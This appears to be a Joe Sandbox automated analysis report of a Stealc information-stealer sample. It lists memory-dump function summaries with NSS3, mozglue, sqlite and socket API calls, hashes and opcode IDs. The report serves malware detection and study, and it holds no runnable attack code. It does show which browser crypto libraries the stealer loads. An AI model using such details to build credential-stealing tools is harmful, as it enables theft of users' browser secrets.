                                                                                                                                                                            • Instruction Fuzzy Hash: EB1106B6B0DA94DFDF40DF69E849B023BB9AB4A254B280029D52AC7710E731A415CF91
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6C9A7C73
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9A7C83
                                                                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6C9A7C8D
                                                                                                                                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C9A7C9F
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C9A7CAD
                                                                                                                                                                              • Part of subcall function 6C959BF0: TlsGetValue.KERNEL32(?,?,?,6C9A0A75), ref: 6C959C07
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 105370314-0
                                                                                                                                                                            • Opcode ID: a65d072c8470ba5ccb85ac168c8e2d2de4b6a7097d9ff77774d8ea7f43e37ca9
                                                                                                                                                                            • Instruction ID: ed6012ac31bbf85898e0dec7c4a57116f124bb666d46f35645418fc26a5bd790
                                                                                                                                                                            • Opcode Fuzzy Hash: a65d072c8470ba5ccb85ac168c8e2d2de4b6a7097d9ff77774d8ea7f43e37ca9
                                                                                                                                                                            • Instruction Fuzzy Hash: F6F0C2F19102167BEB009FBA9C099577B6CEF25265B118435EC09C3B00E734E126CAE5
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6C9AA6D8), ref: 6C9AAE0D
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C9AAE14
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6C9AA6D8), ref: 6C9AAE36
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C9AAE3D
                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,?,6C9AA6D8), ref: 6C9AAE47
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$CriticalDeleteSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 682657753-0
                                                                                                                                                                            • Opcode ID: 36bbbb861e887f34f1244913bb0f442557b0e56d754d1acd0805a9b3a01c3b8b
                                                                                                                                                                            • Instruction ID: a3f7b5d59ff7c6abb712f052a0c08b225ebb831ae9d8f82e9542208d98d63717
                                                                                                                                                                            • Opcode Fuzzy Hash: 36bbbb861e887f34f1244913bb0f442557b0e56d754d1acd0805a9b3a01c3b8b
                                                                                                                                                                            • Instruction Fuzzy Hash: CEF09676201A01A7CF10AFA8E808957BB7CBF8A7757340328E57A83940D731E116CBD5
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C837D35
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                            • Opcode ID: 389eb1f8eda7d1c22b0256cf560f2fee31a8dc171959a15d370e78d7a2565ab9
                                                                                                                                                                            • Instruction ID: f22110c7e4f3fe7860f38be6ba5e65bf4fceb228ab2037e4cc0e06fdfe55ef17
                                                                                                                                                                            • Opcode Fuzzy Hash: 389eb1f8eda7d1c22b0256cf560f2fee31a8dc171959a15d370e78d7a2565ab9
                                                                                                                                                                            • Instruction Fuzzy Hash: B9311631E04239D7C721CF9DCA809B9B7F1AF84309B5969A6E44CB7B89D270E841C7E0
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C826D36
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C826D2F
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C826D20
                                                                                                                                                                            • database corruption, xrefs: 6C826D2A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                            • Opcode ID: b9e73ed574a18d439a71c08ff691a85182ffff6a249567f5cbbe9fa299470e4f
                                                                                                                                                                            • Instruction ID: a621bec27ece7e816682750727e999f456a435609f566a016d4cbe8b25d4cebc
                                                                                                                                                                            • Opcode Fuzzy Hash: b9e73ed574a18d439a71c08ff691a85182ffff6a249567f5cbbe9fa299470e4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 852102306043099BC3308E19CA45B5AB7F5AF80309F148D29D8499BF51E376F9888BD2
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C95CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C95CC7B), ref: 6C95CD7A
                                                                                                                                                                              • Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C95CD8E
                                                                                                                                                                              • Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C95CDA5
                                                                                                                                                                              • Part of subcall function 6C95CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C95CDB8
                                                                                                                                                                            • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C95CCB5
                                                                                                                                                                            • memcpy.VCRUNTIME140(6C9F14F4,6C9F02AC,00000090), ref: 6C95CCD3
                                                                                                                                                                            • memcpy.VCRUNTIME140(6C9F1588,6C9F02AC,00000090), ref: 6C95CD2B
                                                                                                                                                                              • Part of subcall function 6C879AC0: socket.WSOCK32(?,00000017,6C8799BE), ref: 6C879AE6
                                                                                                                                                                              • Part of subcall function 6C879AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8799BE), ref: 6C879AFC
                                                                                                                                                                              • Part of subcall function 6C880590: closesocket.WSOCK32(6C879A8F,?,?,6C879A8F,00000000), ref: 6C880597
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                            • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                            • API String ID: 1231378898-412307543
                                                                                                                                                                            • Opcode ID: f77382f225e633991e773b5e934310ffaee92a962bced7cb361afe3f818e6bd7
                                                                                                                                                                            • Instruction ID: 08dee7acb9474ace5532a4f8839c2ad7297925b1996929e1d7b8bd1502308a40
                                                                                                                                                                            • Opcode Fuzzy Hash: f77382f225e633991e773b5e934310ffaee92a962bced7cb361afe3f818e6bd7
                                                                                                                                                                            • Instruction Fuzzy Hash: D11181F1B083405EDB019FAEAC06B867AB8A357318F201439E42ACFF41E771C4158BE2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6C901D8F
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C901DA6
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C901E13
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C901ED0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 84796498-0
                                                                                                                                                                            • Opcode ID: 2fb13c7974561cd73ffc18ee23241ed0c924a7f65008a1df1728d97161605cc9
                                                                                                                                                                            • Instruction ID: 63945b5d85713102e9e6fe0344db7c965adf2817f592c7b8b772a1ceb764f794
                                                                                                                                                                            • Opcode Fuzzy Hash: 2fb13c7974561cd73ffc18ee23241ed0c924a7f65008a1df1728d97161605cc9
                                                                                                                                                                            • Instruction Fuzzy Hash: 36516775A00309CFDB10CF98D884BAEB7BAFF4A318F144529E81A9B750D731E945CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967E10
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967EA6
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C967EB5
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C967ED8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _byteswap_ulong
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4101233201-0
                                                                                                                                                                            • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                            • Instruction ID: bcef3f836fcd4a20b4dd23739383d81d28b392f668e00ee6f84176eecd25ec81
                                                                                                                                                                            • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                            • Instruction Fuzzy Hash: 2F31B5B1A001118FDB05CF09DC9099ABBE2FFC831871B8169C8585BB61EB71EC55CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C896C8D
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C896CA9
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C896CC0
                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C9B8FE0), ref: 6C896CFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2370200771-0
                                                                                                                                                                            • Opcode ID: f7ae0ae310374cb61c53667eecbc92e0c668cfe787217ddf9e2acfaf7fa45aa4
                                                                                                                                                                            • Instruction ID: 7edac3fcd97e11a26d00b9aac077547ee4245a3f67b747204a97d22f37366894
                                                                                                                                                                            • Opcode Fuzzy Hash: f7ae0ae310374cb61c53667eecbc92e0c668cfe787217ddf9e2acfaf7fa45aa4
                                                                                                                                                                            • Instruction Fuzzy Hash: AB3170B1A002169FEB18CF69C951ABFB7F5EB89248B14483DD915D7710EB319905CBE0
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6C906E36
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C906E57
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6C906E7D
                                                                                                                                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6C906EAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3163584228-0
                                                                                                                                                                            • Opcode ID: fd8bd86ba599021db9bb22213885ab8c6ee328352176bbcb4a49c5d776e85040
                                                                                                                                                                            • Instruction ID: 9e1df9276289cb65c551e9ff1ca887d4db6a41b88baef44e0a385fdb13d3196f
                                                                                                                                                                            • Opcode Fuzzy Hash: fd8bd86ba599021db9bb22213885ab8c6ee328352176bbcb4a49c5d776e85040
                                                                                                                                                                            • Instruction Fuzzy Hash: 5231C172710712EEDB145F34DC043A6B7A9AB1131AF20063CDC99D6A80EB30F4E8CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDDF4
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDE0B
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C8EDDB1,?,00000000), ref: 6C8EDE17
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C8EDE80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3725328900-0
                                                                                                                                                                            • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                            • Instruction ID: d93d77b881e9bb22bc0f4dfb7296e019c3236395f4f7ca82e39db3ba6b1961b0
                                                                                                                                                                            • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                                                                                                                                            • Instruction Fuzzy Hash: FA31C9B19017439BE720CF5AC984652B7A4BFEA318B14962ADC1C87B01E771E498CB80
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(6C8B5ADC,?,00000000,00000001,?,?,00000000,?,6C8ABA55,?,?), ref: 6C8DFE4B
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C8DFE5F
                                                                                                                                                                            • PR_Unlock.NSS3(78831D74), ref: 6C8DFEC2
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8DFED6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 284873373-0
                                                                                                                                                                            • Opcode ID: 7dbfafb133aa3677fc6cb57637c3c0cb09eaf7471af9f2e3c92c3e1100e1246c
                                                                                                                                                                            • Instruction ID: fc1ecba206b8c3111cae0f572bcce0779aef7116f1dc527f77e557dc4bc410a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7dbfafb133aa3677fc6cb57637c3c0cb09eaf7471af9f2e3c92c3e1100e1246c
                                                                                                                                                                            • Instruction Fuzzy Hash: E9213431A00626ABD720AF68DA4479A7374BF25358F1A0924DC08ABE01E730F924CBD0
                                                                                                                                                                            APIs
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891EE2
                                                                                                                                                                              • Part of subcall function 6C8F1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C891D97,?,?), ref: 6C8F1836
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F13
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,6C894CA0,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F37
                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,6C894C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6C894C64,?,-00000004), ref: 6C891F53
                                                                                                                                                                            Memory Dump Source
